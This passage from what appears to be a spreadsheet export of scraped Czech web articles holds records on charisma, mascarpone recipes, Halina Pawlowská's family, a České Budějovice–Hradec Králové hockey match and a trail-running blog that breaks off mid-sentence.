paradox, že říkáte, nebo říkáš, promiň, mně to furt vypadává, že ten člověk potom v zásadě nic nedělá, ale zase na druhou stranu se teda charismatu a sebevědomí můžeme naučit. Tak kde se to setkává, protože pokud nejsem přirozený talent, já bych byl rád přirozeně charismatický a nic pro to nedělal, ale v momentě, kdy začnu pracovat na svém charismatu, tak někdo už řekne no, ale to není autentický, to nejsi ty, vždyť na tom pracuješ. No, je to vrátit se paradoxně k sobě, ale ty musíš překousnout zase jako odloupat ty slupky té cibule, kterou sis tam naloupal, jo. Takže samozřejmě že t není. Takhle se rozhodnu a teď na tom popracuju a zítra jsem charismatický, ale třeba poprvé ti to najednou, a poznáš to na těch stresových zónách, na těch nekomfortních situacích prostě, učíš se to. To znamená, ty jeden týden najednou zvládneš nějakej nekomfort jinak, s takovým větším jako klidem a prostě přijetím té situace, a na druhých, třech ztroskotáš, ale najednou za půl roku už ztroskotáš jenom v jedné a už máš přijetí těch třech prostředí. A takhle pomalinku se dostáváš k tomu, že už si to víceméně fakt umíš jako přijmout nebo projít tím sám za sebe v té své hodnotě. Někteří lidé si myslí, že se něco naučíme, pracovat s tím tělem a myslí a do konce života poplujeme na obláčku jako spokojenosti, ale to je zase ten omyl prostě, protože život je stavěnej že nám pořád se budou dít nějaký nový věci, budeme stárnout, bude nám někdo ubližovat, budou se nám rozhazovat vztahy a skládat dohromady, ale to charisma je právě to, že vy pak máte daleko větší sílu to unést a přijmout i to, že jste třeba teď smutnej nebo vzteklej. Ale ne se snažit jako nadávat si, že já jsem chudák, mě zas někdo opustil, nebo já se s někým jako pohádala, proč se mi to děje a myslet si, že když budu charismatická, že se mi to dít nebude. To je hloupost, že jo, to je jako velká hloupost. No, a ty už jsi několikrát zmínila tu snaživost. Tak co si p</t>
  </si>
  <si>
    <t>20241201_61_3477905949_4d11b3c07a56ae019ba9.html</t>
  </si>
  <si>
    <t>4d11b3c07a56ae019ba9</t>
  </si>
  <si>
    <t>Mascarpone – recepty a tipy pro přípravu dezertů</t>
  </si>
  <si>
    <t>Mascarpone – recepty a tipy pro přípravu dezertů Mascarpone, jemný smetanový sýr s hedvábnou texturou, je ikonickou ingrediencí sladké i slané kuchyně. Pochází z Itálie , kde má dlouhou tradici, a postupem času se jeho využití rozšířilo do celého světa. Dnes je mascarpone nedílnou součástí přípravy dezertů, dortů, krémů i rychlých moučníků, přičemž si zachovává své místo i ve slaných pokrmech. Díky své univerzálnosti a bohaté chuti nabízí nesčetné možnosti kombinací, které osloví gurmány i příležitostné kuchaře. Mascarpone propojuje tradiční recepty s moderními trendy, čímž si získává pevné místo v každé kuchyni. Článek přináší praktické tipy na přípravu krémů a moučníků, jako je krém z mascarpone a šlehačky, jednoduché tiramisu z mascarpone bez vajec nebo narozeninový dort s mascarpone a ovocem. Kromě toho se věnuje historii této potraviny, její roli v italské kuchyni a zajímavostem spjatým s mascarpone. Nejdůležitější informace článku: Krém z mascarpone je univerzální surovinou, kterou lze využít pro přípravu dezertů, dortů nebo sladkých pohárů. Například jednoduché tiramisu z mascarpone bez vajec představuje lehkou, svěží a rychlou alternativu tradičního receptu. Narozeninový dort s mascarpone a čerstvým ovocem se stává skvělým a efektním pohoštěním pro slavnostní příležitosti. Koláče a moučníky připravené s mascarpone nabízejí snadnou přípravu i výjimečně lahodnou chuť. Mascarpone se výborně hodí také do slaných pokrmů, čímž nachází své uplatnění i v moderní gastronomii. Mascarpone má své kořeny v italské Lombardii , kde se vyrábí již po staletí a je neodmyslitelnou součástí tamní kuchyně. Historie mascarpone je spjata s tradičními recepty i významnými osobnostmi, pro které byl tento sýr symbolem luxusu. Rostlinné alternativy mascarpone přinášejí inovativní možnosti, které odpovídají současným trendům moderního stravování. Krém z mascarpone – základ pro dokonalé dezerty Krém z mascarpone je oblíbenou složkou mnoha dezertů. Kombinace mascarpone, smetany ke šlehání a vanilkového extraktu vytváří nejlepší krém z mascarpone, který vyniká lehkostí a hedvábnou texturou. Tento základ je ideální pro dezerty, jednoduché dorty s mascarpone i skleničkové pochoutky. Krém z mascarpone a šlehačky se snadno připravuje a je univerzální. Lze jej ochutit vanilkou, čokoládou nebo ovocnými pyré. Používá se do dezertů, jako je tiramisu, nebo jako krém z mascarpone na dort. Hodí se k letním ovocným dortům i k zimním čokoládovým moučníkům. Recept na nejlepší krém z mascarpone Ingredience: 250 g mascarpone 200 ml smetany ke šlehání (min. 33 % tuku) 3 lžíce moučkového cukru 1 lžička vanilkového extraktu Postup: Mascarpone se vloží do mísy a krátce prošlehá, aby se získala jemná a krémová konzistence. V jiné míse se ušlehá smetana ke šlehání do tuhé konzistence, je však třeba dbát na to, aby se nepřešlehala. K mascarpone se přidá moučkový cukr a vanilkový extrakt, směs se jemně promíchá. Ušlehaná smetana se postupně přidává k mascarpone a jemně se zapracuje stěrkou, aby krém zůstal lehký a nadýchaný. Krém z mascarpone vyniká svou jednoduchou přípravou a univerzálností, díky čemuž se stává oblíbenou volbou pro rychlé všední dezerty i pro náročnější slavnostní pohoštění. Lze jej snadno přizpůsobit různým chutím přidáním vanilky, čokolády, ovoce nebo likérů, což otevírá nekonečné možnosti při tvorbě receptů. Svou hedvábnou texturou a jemnou chutí dokáže povýšit dorty, poháry i koláče na nezapomenutelný gurmánský zážitek. Tento všestranný krém je zároveň základem oblíbených dezertů, jako je tiramisu nebo ovocné dorty, a může být doplněn šlehačkou pro ještě nadýchanější konzistenci. Tiramisu ocení každý milovník kávy. Jednoduché tiramisu z mascarpone bez vajec Tiramisu, jeden z nejoblíbenějších italských dezertů, nabízí nekonečné možnosti přizpůsobení různým chutím a dietním požadavkům. Verze bez vajec, která je lehčí a svěží, je také vhodná pro osoby s alergiemi nebo ty, kteří preferují stravu s nižším obsahem cholesterolu. Přesto si zachovává neodolatelnou kombinaci kávy, mascarpone a piškotů, která dělá tiramisu tak oblíbeným po celém světě. Klasické piškoty se namáčí v silné kávě. Krém se připravuje pouze z mascarpone, šlehačky a cukru. Dezert se vrství v miskách nebo skleničkách. Zakončuje se kakaovým práškem nebo čokoládovými hoblinkami. Tento jednoduchý recept na tiramisu z mascarpone bez vajec vyžaduje jen několik základních ingrediencí a minimální čas na přípravu. Suroviny: 500 g mascarpone 250 ml smetana ke šlehání 100 g cukr moučka 250 ml silná káva (chladná) 2-3 lžíce likér Amaretto (nebo jiný kávový likér) 2 balení piškotů Kakao na posypání Postup přípravy: Příprava kávy: Uvaří se silná káva a nechá se zcela vychladnout. Přidá se likér Amaretto a směs se dobře promíchá. Příprava krému: Ve velké míse se šlehá smetana do tuha. Zvlášť se vyšlehá mascarpone s cukrem do hladka. Následně se opatrně vmíchá šlehaná smetana do mascarpone. Složení tiramisu: Do formy nebo misky se střídavě klade vrstva piškotů namočených v kávě a vrstva krému. Začíná se i končí vrstvou krému. Dokončení: Hotové tiramisu se posype kakaem a nechá se alespoň 2 hodiny chladit v lednici před podáváním. Tipy: Piškoty: Piškoty se do kávy namáčejí rychle, aby se nerozpadly. Sladkost: Množství cukru se může upravit podle individuální preference. Likér: Pokud se nepoužívá alkohol , může se množství kávy zvýšit. Dekorace: Tiramisu lze ozdobit nastrouhanou čokoládou nebo čerstvým ovocem. Pro osoby s celiakií nebo intolerancí na lepek je možné použít bezlepkové piškoty. Dnes jsou na trhu k dispozici různé druhy bezlepkových piškotů, které se skvěle hodí pro přípravu tiramisu. Chutí se nijak neliší od klasických piškotů. Kombinace čerstvého ovoce a jemného krému z mascarpone nikdy nezklame. Dort s mascarpone: Lehké krémy a čerstvé ovoce Dorty s mascarpone patří mezi nejoblíbenější dezerty pro slavnostní příležitosti. Narozeninový dort s mascarpone a ovocem spojuje svěží chuť ovoce s jemností mascarpone krému. Krém z mascarpone a šlehačky je ideální na zdobení dortu. Dort lze doplnit čerstvým ovocem, jako jsou jahody, maliny nebo kiwi. Základ tvoří lehký piškot nebo čokoládový korpus. Ovocný dort s mascarpone se hodí zejména pro letní oslavy. Potřebné suroviny: Pro korpus: 200 g hladké mouky 200 g cukru 10 lžic slunečnicového oleje 20 lžic vlažné vody 4 vejce (zvlášť žloutky a bílky) 1 prášek do pečiva Pro krém: 500 g mascarpone 250 ml smetany ke šlehání 100 g cukru moučka 1 vanilkový lusk nebo vanilkový extrakt Na ozdobu: Čerstvé ovoce dle chuti (jahody, maliny, borůvky, kiwi) Mentové lístky Postup přípravy: Příprava korpusu: Žloutky se cukrem se vyšlehají do pěny. Přidá se olej, voda, mouka a prášek do pečiva a vše se důkladně promíchá. Z bílků se ušlehá tuhý sníh a opatrně se vmíchá do těsta. Těsto se nalije do dortové formy vyložené pečícím papírem a peče se v předehřáté troubě na 180 °C do zlatavé barvy. Příprava krému: Mascarpone, smetana, cukr a semínka z vanilkového lusku (nebo vanilkový extrakt) se vyšlehají do hladkého a nadýchaného krému. Sestavení dortu: Upečený a vychladlý korpus se potře krémem. Vrch a boky dortu se ozdobí čerstvým ovocem a mentovými lístky. Podávání: Dort se nechá chvíli vychladit v lednici a poté se podává. Tipy: Ovoce: Kromě uvedeného ovoce lze použít i jiné druhy ovoce dle sezónní dostupnosti. Korpus: Jako základ lze použít i kupovaný piškot nebo čokoládový korpus. Krém: Do krému lze přidat nastrouhanou čokoládu, ořechy nebo jiné oblíbené přísady. Dekorace: Fantazii se meze nekladou. Dort lze ozdobit dle vlastních představ, například pomocí čokoládové polevy, cukrových ozdob nebo jedlých květ. Díky krému z mascarpone na dort získává moučník jemnou texturu a chuť, která se snadno kombinuje s dalšími ingrediencemi. Rychlé moučníky z mascarpone – recept Mascarpone je ideální pro přípravu rychlých moučníků. Rychlé moučníky z mascarpone, dezerty z mascarpone do skleničky nebo koláče s mascarpone nabízí snadnou přípravu a univerzální chuť. Rychlovky z mascarpone mají tedy rozhodně co nabídnout například v situacích, kdy je potřeba připravit sladkost bez složitého pečení. Recept na hrnkový koláč s mascarpone: Do mísy se přidají 2 hrnky polohrubé mouky, 1 hrnek cukru, 1 prášek do pečiva, 1/2 hrnku mléka, 2 vejce a 250 g mascarpone. Vzniklé těsto se vlije do vymazané formy, posype ovocem a drobenkou a peče při 180 °C přibližně 35 minut. Mascarpone zajišťuje vláčnost těsta a bohatou chuť, která pozvedne i ty nejjednodušší moučníky. Hrnkový koláč s mascarpone je velmi rychle připraven a je ideální pro nečekané návštěvy nebo rychlou sladkou svačinu. Rychlovka z mascarpone může být také dezert z mascarpone do skleničky. 200 g rozdrcených sušenek vytvoří základ ve skleničkách. 250 g mascarpone, 150 ml smetany, 3 lžíce moučkového cukru a vanilka se vyšlehají do krému, který se navrství na sušenky. Přidá se zhruba 300 g ovoce a další vrstva krému. Dezert se ozdobí čokoládou nebo mátou a nechá vychladit. Elegantní a chutná rychlovka z mascarpone pro každou příležitost. Tradiční a moderní využití mascarpone V tradiční italské kuchyni má mascarpone nezastupitelné místo. Dezerty jako tiramisu nebo koláče s mascarpone se připravují podle receptů předávaných generacemi. Moderní kuchyně experimentuje s jeho využitím v rostlinných alternativách, například z kešu ořechů nebo kokosového mléka. Rostlinné alternativy mascarpone: Nové možnosti pro moderní kuchyni Pro veganskou a rostlinnou stravu existují stále častěji používané alternativy klasického mascarpone. Tyto produkty jsou vyráběny z ořechů, například kešu nebo mandlí, kokosového mléka či sóji. Výsledkem je krém s podobnou texturou a chutí, který neobsahuje živočišné složky. Rostlinné mascarpone je vhodné pro přípravu dezertů, jako je jednoduché tiramisu z mascarpone bez vajec, nebo například ovocný dort s mascarpone na rostlinné bázi. Příprava domácí rostlinné verze mascarpone je rovněž možná. Za použití kešu ořechů, které se namočí a poté rozmixují s kokosovým krémem a trochou citrónové šťávy, vznikne jemný a bohatý krém. Rostlinné varianty rozšiřují možnosti v kuchyni a oslovují ty, kdo hledají udržitelnější a etičtější alternativy bez kompromisů na chuti a kvalitě. Historie mascarpone – od Lombardie po světové kuchyně Mascarpone, jemný a krémový sýr s bohatou historií, má své kořeny v italské Lombardii . Jeho výroba se datuje do 16. století, kdy sloužil jako jednoduchý a účinný způsob konzervování smetany. Název „mascarpone“ pravděpodobně pochází z lombardského dialektu, kde slovo „mascherpa“ označovalo mléčný produkt. Původně se mascarpone vyrábělo výhradně v zimních měsících, kdy bylo mléko nejtučnější. V průběhu času se však výroba zdokonalila a sýr si získal oblibu po celý rok. Jeho výroba je poměrně jednoduchá a spočívá ve srážení smetany pomocí kyseliny vinné. Výsledkem je jemný, krémový sýr s nasládlou chutí, který se skvěle hodí do mnoha receptů. V minulosti bylo mascarpone symbolem luxusu a bylo podáváno na stolech italských šlechticů. Dnes je dostupné po celém světě a je nepostradatelnou součástí mnoha italských dezertů, jako je například tiramisu. Kromě sladkých pokrmů se mascarpone používá také do slaných jídel, jako jsou těstoviny, rizoto nebo omáčky. Jeho jemná chuť a krémová konzistence dodávají pokrmům bohatost a hloubku. Mascarpone a historické osobnosti Mascarpone byl oblíbenou delikatesou mnoha šlechticů a významných osobností. Papež Klement VIII . údajně ocenil jeho jemnou chuť při návštěvě Milána . Casanova údajně používal mascarpone jako tajnou přísadu do svých dezertů, kterými okouzloval své hosty. Publikováno: 1. 12. 2024 Michal Hardyn Dlouhodobě se zabýváme tvorbou kvalitních článků, receptů a užitečných návodů. Klademe si za cíl srozumitelnost, poutavost a co největší přínos čtenáři. Naše návody a recepty jsou inspirací pro všechny, kdo chtějí žít zdravě a zároveň poznat svůj vnitřní svět i svět kolem sebe. Autor: Michal Hardyn Autor person Michal Hardyn</t>
  </si>
  <si>
    <t>734</t>
  </si>
  <si>
    <t>20241201_62_3477899191_08ec7c6f98e0cce01191.html</t>
  </si>
  <si>
    <t>08ec7c6f98e0cce01191</t>
  </si>
  <si>
    <t>Halina Pawlowská chtěla mít osmnáct dětí, má jen dvě. Dcera je návrhářka, syn nemluva</t>
  </si>
  <si>
    <t>Halina Pawlowská chtěla mít osmnáct dětí, má jen dvě. Dcera je návrhářka, syn nemluva Milovaná babička inspirovala spisovatelku a herečku Halinu Pawlowskou k tomu, aby snila o početné rodině. Nakonec je ale ráda, že má dvě úspěšné děti, na které může být právem pyšná. Je tomu už nějaký ten pátek, co se Halina Pawlowská v zábavném pořadu Inkognito! svěřila, že chtěla mít v mládí neuvěřitelných osmnáct dětí. Podobný počet jí ale na mysl nepřišel jen tak. Inspirací jí byla vlastní rodina, konkrétně pak babička, kterou ale nikdy neviděla živou. „Měla osmnáct dětí, chtěla jsem být zřejmě dokonalá, jako byla ona,“ popsala s tím, že se ale dospělosti dožila jen polovina z nich. Dětství prožila jen v jedné místnosti Sama ale byla v dětství ráda, že se její rodiče babičkou neinspirovali. Halina Pawlowská totiž žila s maminkou a tatínkem v malé garsonce, a díky tomu toužila po klidu. „U nás totiž pořád byly návštěvy. Moji rodiče hráli závodně šachy, takže stále doma s někým trénovali. Bylo to vždy plný dramat a pilo se k tomu víno . V tu dobu jsem chtěla být zalezlá a číst si,“ cituje Pawlowskou web Kafe. Zhruba před rokem pak Halina promluvila i o svém vztahu s maminkou. Moderátorovi Honzovi Dědkovi v jeho show prozradila, že k ní byla hodně kritická a snad nikdy se od ní nedočkala pochvaly. Maminka jí vždy říkala, že podle ní nikdy žádnou hodnotu nevytvořila. „A když jí jednou někdo říkal, jestli to není krásný, jak je Haločka v tý televizi. Tak ona řekla: Je, můžu ji vypnout! Ona nejenom, že nelichotila a nechválila, ono bylo vůbec obtížný existovat,“ svěřila se v 7 pádech Honzy Dědka . Manžela dokonale utajila Životní láskou Haliny Pawlowské byl její manžel Zdeněk Pawlowski, se kterým prožila krásných pětatřicet let svého života. Poznali se ještě v době, kdy studovala na FAMU scenáristiku a dramaturgii. Halina se do něj zamilovala i přes to, že Pawlowski randil s jinou ženou, která v té době čekala dítě. Aby toho nebylo málo, tak ještě měli před svatbou. Halině se ale podařilo nějakým způsobem Zdeňka přesvědčit, aby se vzali ještě dříve , než je termín svatby s jeho partnerkou. Vzali se tak jen několik týdnů po seznámení a nikomu o tom neřekli. Pawlowská poté svého manžela dlouho tajila. Sice o něm často mluvila, ale jeho identitu střežila jako oko v hlavě. Došlo to tak daleko, že když ho konečně odhalila, začalo se povídat, že je to její milenec . Samozřejmě to ale nebyla pravda, jen byl pro veřejnost neznámý. Nakonec „jen“ dvě děti Společně s manželem Halina Pawlowská přivedla na svět dvě děti - dceru Natálii a syna Petra . Natálie postupně vyrostla ve velmi pohlednou dámu s velkým osobním kouzlem. Média si ji začala všímat hlavně díky jejímu manželství s Tomášem Břínkem alias TMBK. Láska jim ale nevydržela a rozvedli se. Dcera Natálie je módně návrhářkou a dlouhé roky provozovala butik s dámskými šaty. Později s maminkou rozjely podnikání a mají svou značku HalinaNatálie, která je určitě pro ženy všech tvarů. O svém synovi Petrovi tolik nemluví. Halina Pawlowská se v minulosti několikrát nechala slyšet, že když se ho na něco ptá, mlčí. „ Můj syn je po mém manželovi, to znamená, že mluví málo. Vlastně nemluví vůbec. Asi ve dvanácti se rozhodl, že nebude odpovídat na žádné debilní otázky, což znamená, že se mnou vůbec nemluví. A ze všeho nejvíc nenávidí konkrétní dotazy. Proto já o něm opravdu nic nevím,“ uvedla v minulosti pro Sedmičku. Letos je tomu jedenáct let, co Halina Pawlowská oplakávala odchod svého manžela na věčný odpočinek. Sama ale nezůstala, jejím partnerem je sympatický producent Karel Czaban. Ten už dokonce spisovatelku požádal několikrát o ruku, ale zatím mu své „ano“ neřekla. „O ruku mě žádá pokaždé, když je mu nejhůř, nebo má na kahánku. Takže zatím žádná svatba nebude,“ uvedla s humorem sobě vlastním. Zdroje: tyden.cz , ahaonline.cz , dotyk.cz , zeny.iprima.cz , kafe.cz</t>
  </si>
  <si>
    <t>20241201_63_3478664296_5bee9d54d212515a6405.html</t>
  </si>
  <si>
    <t>5bee9d54d212515a6405</t>
  </si>
  <si>
    <t>Reportáž ze zápasu: České Budějovice – Hradec Králové 4:2 – CEB - MHK - 4:2 - Čtvrtá výhra v řadě, Motor proti Hradci uspěl</t>
  </si>
  <si>
    <t>Reportáž ze zápasu: České Budějovice – Hradec Králové 4:2 – CEB - MHK - 4:2 - Čtvrtá výhra v řadě, Motor proti Hradci uspěl 01.12.2024, Marek Dvořák CEB - MHK - 4:2 - Čtvrtá výhra v řadě, Motor proti Hradci uspěl Motor doma porazil Hradec Králové . Jihočeši v utkání již v první třetině dvakrát vedli. Ve druhé třetině své vedení udrželi a v třetině třetí ještě o gól rozšířili. Budějovičtí tak zapisují čtvrtou výhru v řadě. Pátý korálek mohou Jihočeši navléct již ve středu v Budvar areně proti Vítkovicím . Úvodní buly vyhrál Motor a i on vstoupil do utkání aktivněji. První větší šanci si připsal domácí kapitán Gulaš, avšak na konci čtvrté minuty pálil z otočky mimo. O necelou minutu později brankou neskončila ani souhra Zohorny s Olesenem, proti ní se totiž vytáhl zákrokem brankář Hradce Škorvánek. V čase 5:38 to však již Motoru vyšlo. Ordoš posunul puk ve středním pásmu Kašlíkovi, který ho potáhl do pásma útočného. Slovenskému útočníkovi najížděl na druhém křídle ještě jeden ze spoluhráčů. Matej Kašlík se však rozhodl pro krásně utaženou střelu, kterou otevřel skóre - 1:0. Motor se brankou posílil a chtěl vedení ihned navýšit, avšak Hradec z první šance na druhé straně vyrovnal. Kalina dostal puk na Graema McCormacka, který si nabruslil do útočné zóny a povedenou ranou v čase 7:21 vymetl pavučinky v budějovické síti - 1:1. V deváté minutě byl vyloučen za sekání hostující Miškář, Motor si však v přesilové hře nevytvořil žádnou velkou šanci. Následně si oba týmy utvořily několik šancí, které však neměli nejmenší problém pochytat brankáři obou mužstev. Důležitý moment přišel až v čase 12:25. To byl vyloučen za podrážení hostující Freibergs a Motor po jedenácti sekundách trestal. Gulaš předal puk Zohornovi, který přesnou přihrávkou zpoza branky našel Jana Ordoše , který vrátil Jihočechům vedení - 2:1. Motor po vstřelené brance opět ožil. Velmi nebezpečné byly například pobyty první formace Motoru, avšak všechny šance opět pochytal Škorvánek. V sedmnácté minutě z bezprostřední blízkosti netrefil branku na druhé straně Jergl. Vůbec největší šanci na další změnu skóre však spálil v 19.minutě Ordoš , který osamocen před brankou trefil pouze Škorvánka. Ve zbytku třetiny se již nic podstatného neudálo, a tak byl stav o první pauze 2:1 z pohledu Motoru. Motor do druhé třetiny nevstoupil ideálně. Již po 59 sekundách se nechal vyloučit domácí brankář Klouček za posunutí branky. Trest za něj odpykal kapitán Gulaš, který na trestné lavici zůstal pouze 41 sekund. Klíma krásnou přihrávkou přes osu hřiště našel Aleše Jergla, který s menší dávkou štěstí dostal puk podruhé v zápase za Kloučka - 2:2. Reakce Motoru však snad ani nemohla být lepší. Nejdříve ujela do přečíslení dvojice Harris - Ordoš , která si však nerozuměla kombinačně, a tak Motoru vedení nevrátila. To se ale povedlo v čase 23:54 právě kanadskému útočníkovi. V tu dobu hráli domácí přesilovku po vyloučení hostujícího útočníka Dmowského. Gulaš skvěle zachytil puk a vrátil ho do předbrankového prostoru pro Branta Harrise, který potřetí dostal Motor do vedení - 3:2. V 25.minutě rozhodčí opět vylučovali. Museli tak učinit kvůli vzájemné potyčce mezi Douderou a hostujícím Pavlíkem. Na konci 29.minuty už většina fanoušků Motoru zvedala ruce nad hlavu počtvrté, ale Přikryl při další početní výhodě z blízka netrefil branku. Hradecká nedisciplinovanost však pokračovala nadále. V 30.minutě usednul na trestnou lavici Freibergs, domácí si však kromě další spálené šance Přikryla nic nevytvořili. A tak do útoku opět vyrazil Hradec . Klouček musel zasahovat proti střele Jergla. Následně se hra přelévala ze strany na stranu. Za domácí se však netrefil například Vráblík. Naopak za Hradec nepřesně pálil Klíma. Novotný v další šanci pálil pouze do připraveného Kloučka. Další Vráblíkův pokus z 39.minuty pochytal Škorvánek. Ani jiní střelci ve zbytku třetiny neuspěli, a tak byl stav o druhé přestávce 3:2 z pohledu Motoru. Do třetí třetiny vstoupili domácí velmi dobře. Nejdříve sice musel Klouček čelit Klímově střele, tu však bez váhání schoval v lapačce. Avšak poté vyrazili do útoku opět domácí. První střelu Beránka ještě Škorvánek chytil, ale v čase 42:29 již lovil puk ze své sítě počtvrté. Koláček zachytil chybnou rozehrávku hostů a vyslal po křídle do úniku Jakuba Valského a ten pěknou ranou dostal Motor poprvé do dvoubrankového vedení - 4:2. Ve 44.minutě se již Pavlík hotovil ke střele, ale skvělým obranným zákrokem ho zastavil Ordoš . O dvě minuty později si Klouček skvělým reflexem smlsnul na zakončení Perreta. Následně budějovický brankář musel likvidovat ještě zakončení Novotného či Pláňka, avšak ani oni si na maskovaného muže s číslem 35 nepřišli. V 49.minutě byli za hrubost po vzájemné potyčce vyloučeni Zohorna a hostující Pour. Následně byli aktivnější hosté. Perret, Batna i Pavelka však ztroskotali opět na připraveném domácím brankáři, popřípadě na dobře hrající obraně Motoru. V 55.minutě našel slibně najetého Gulaše přihrávkou Pýcha. Domácí kapitán však složité zakončení z úhlu v branku neproměnil. V 56.minutě mohla pro domácí přijít komplikace ve formě vyloučení Přikryla za vyhození puku mimo hřiště. Hosté si vzali oddechový čas o odvolali Škorvánka z branky. Hradec však ani dvojnásobnou přesilovku nevyužil. V posledních minutách se sice Východočeši snažili vrátit se do zápasu, avšak Kloučka již neprostřelili. V posledních sekundách se na ledě strhla potyčka, po které přišly opět tresty na obou stranách, ani ty už však výsledek zápasu neovlivnily. Motor zvítězil nad Hradcem 4:2. Jiří Hanzlík (Motor): "Vítězství nad Hradcem si velice ceníme. Vyrovnali jsme se mu ve vitalitě a houževnatosti. Tentokrát jsme se vyvarovali slabších pasáží, které v utkání míváme. Pouze ve třetí třetině jsme se dostali pod tlak, ale zvládli jsme to mnohem lépe než naposledy doma s Kometou." Peter Frühauf ( Hradec ): "Soupeř byl jasně lepší. Převýšil nás v aktivitě i soubojích, vytvořil si mnohem více šancí. Neměli jsme ani metr ledu, abychom se dostali do naší rychlé a bruslivé hry. Mrzí mě ale, že první gól jsme dostali ze situace, na kterou jsme se připravovali. A při druhém gólu naháníme rozhodčího, který se chystá vylučovat, místo abychom se soustředili na hru. Soupeř by stejně asi vyhrál, ale tyto dvě situace mě naštvaly." Autor: Roman Šimr Autor person Roman Šimr</t>
  </si>
  <si>
    <t>14960</t>
  </si>
  <si>
    <t>5940</t>
  </si>
  <si>
    <t>20241201_64_3477842425_e2b9409e61740e00c9a7.html</t>
  </si>
  <si>
    <t>e2b9409e61740e00c9a7</t>
  </si>
  <si>
    <t>Bunkr run 2024.</t>
  </si>
  <si>
    <t>Bunkr run 2024. Foto: TomášNejedlý Velmi hezké zpestření jednoho zářijového popracovního čtvrtečního odpoledne. Vedle spousty neopakovatelných závodů u nichž se pomalu i postavení na start stává solidním výkonem – často je limit účastníků naplněn mnohem dřív než se očekává, BK Ludgeřovice ( Běžecký Klub Ludgeřovice ) [2] pořádá i volnější akce, kde rychlost ani pořadí v doběhnutí do cíle není až tak podstatné. Pochopitelně závodnická duše ani zde nezahálí a malé nebo i větší „souboje“ zde určitě také budou. Ať už v tom, kdo vyběhne „rychleji“ kopec nebo bude „sbírat body“ krásným a pestrým terénem v lese. Pokud se „pole běžců“ příliš natáhlo, tak se v zajímavějších místech nebo u křižovatek cest na ty poslední počkalo. Nikdo zde žádný čas nepočítal. Myslel jsem si, že čelovky nebudou až tak nutné, že jsou spíš jen pro případ co by kdyby… Proběhnutí bylo tak zajímavé, že jsme nakonec úplně spolehlivě zatměli… Foto: TomášNejedlý Nejprve ale na začátek. Hlavně musím poděkovat jedné běžkyni se kterou možná jen tak „trochu malinko“ ve výsledkových tabulkách „závodím“ o každou pozici (není pro mě až tak rozumné polevit v tréninku, mohlo by se mi to „vymstít“:-)))) ) za svezení na místo startu. DÍKY MOC. V práci jsem tedy nemusel OKATĚ vyjít o něco dřív, ale až tehdy, kdy už skoro všichni byli pryč. Oficiální start byl naplánovaný na půl šesté večer, ale spousta z nás zde již byla o nějakých pár desítek minut dříve. Počasí spíš poněkud chladnější – rozhodl jsem se pro „alpský styl“, tedy beru s sebou jen to podstatné. Jednat se má jen asi o 12 kilometrů, což je „krátká“ vzdálenost, která se dá ve většině případů zvládnout „na sucho“. Nejedná se o závod, tedy medaile na konci nedostáváme, ale naopak již na začátku v Hlučíně na parkovišti vedle železniční stanice (o které jsem do té doby vůbec netušil, že zde nějaká je – vedle je i hospoda s prý naprosto výtečným pivem ) dostáváme nevšední dřevěné magnetky (podobné jako u Zimního běhu Hlučín [3] - [5] v lednu tohoto roku nebo později třeba i u Ludgeřovického krosu [6] - [7], kde pochopitelně v cíli čekaly i krásné medaile – z hlediska grafického ztvárnění určitě jedny z nejkrásnějších medailí, které mám ve sbírce). Nakonec se konečně rozebíháme a není nás vůbec málo [1]. Nyní jen prokličkovat městem a pak už s volností do luk a lesů. Nejprve od nádraží máme schodový rozehřívací úsek a už zde to mnozí z nás vypálí. Při návratu dolů je to možná ještě divočejší a upřímně řečeno zatáčky mám problém vybrat. Za průchodem je cesta už širší a závodní-nezávodní pole se trochu uklidňuje. Na spoustě lidí je vidět, že během žijí. Ve městě je to zatím klidnější „rozklusávání“, ale zhruba po prvním kilometru jde poznat v kom koluje „vrchařské srdce“. Nečekaně se mi i po náročném pracovním dni běží dobře. Možná trochu právě díky němu. Netrvá to dlouho a probíháme kolem kříže. Až teprve v tomto okamžiku, když píšu článek, možná chápu i proč. V mapě objevuji, že nedaleko (pár set metrů západně) v rokli, mě zatím zcela neznámé, by snad i dnes ještě měly být nevšední stavební útvary, které by mohly rozbušit nejedno dobrodružné srdce. Podle fotky totiž místo vypadá jako nějaký vstup do štoly. Zatopený vstup! „Zvědavé já“ by dokonce možná v letních časech nepohrdlo „nabídkou“ průzkumu. Kam onen „sifon“ asi vede? Fotky lákají, ale není na nich vidět jak je pod „hladinou“ hluboko. Jen málokdo „na nádech“ najde odvahu zkoumat, co se nachází dále, mnohdy i s představou, že se někde šprajcne nebo nebude moci se otočit zpět. Jsem zvědav, až se zde někdy vydám, jak toto tajemné místo bude vypadat [19] - [20]. Bude to něco jako menší vydání částečně zatopené štoly koksovny svaté Trojice [8] – [11] nebo třeba štola k Vývěru Říčky I [12], důvěrně známá znalcům Moravského krasu nedaleko takových jeskynních skvostů jako je obrovská portálová jeskyně „Pekárna“, nejblátivější jeskyně minimálně v „ochozské části“ – Malčina [14] – [15] dobře v terénu skryta kousek od „Švédova stolu“ nebo na jeho opačné straně jeskyně Netopýrka [12] - [13] s ne úplně lehce přístupným tokem Říčky spletitými chodbami, které mohou být i ve svých závěrečných vertikálách v některých okamžicích vcelku kluzké a „na morál“? Díky za lana se smyčkami, ale pro jistotu doporučuji dobrodruhům si vzít své lano vlastní. No nic, zpět od vzpomínek na „dobrodružné výpravy“ k podobně zajímavým a nevšedním, ale také mnohem bezpečnějším místům kolem kterých se probíhalo, aniž bych to, alespoň já, vůbec tušil. Foto: TomášNejedlý U „Poutního kříže“ máme první zastávku a já zde dobíhám velice nečekaně na předních příčkách. Později tomu už tak ale nebude…:-) Jen na pár metrů odbočujeme po asfaltce doprava, ale po chvíli se zase vydáváme pokračováním polní a později lesní cesty. V levotočivé zatáčce míjíme po pravici malé jezírko, které je tak malé, že si ani „nezaslouží“ zaznamenání v mapě. Je to spíš jen taková malá tůňka. Chvíli běžíme rovně, abychom v ostřejší zatáčce doprava, která „vyhazuje“ zase změnili směr. Pokud bychom pokračovali rovně, tak bychom se během pár set metrů dostali ke křížové cestě (alespoň podle mapy by tomu tak mělo být - opět budu muset někdy příště prozkoumat). Netrvá to ani pár kroků a zase odbočujeme pro změnu doleva. Většina asi netuší, že se bude jednat o mírně překážkový úsek. Krásné zpestření. Zatímco do kopce mi to šlo, tak zde již ostatní čtou terén lépe, alespoň ti co nejsou krátkozrací. Ač mě pár lidí předběhne, tak se svou pozici snažím nedat až tak lehce a běžím mnohem rychleji, než bych běžel tudy sám. Foto: TomášNejedlý Mělo se jednat 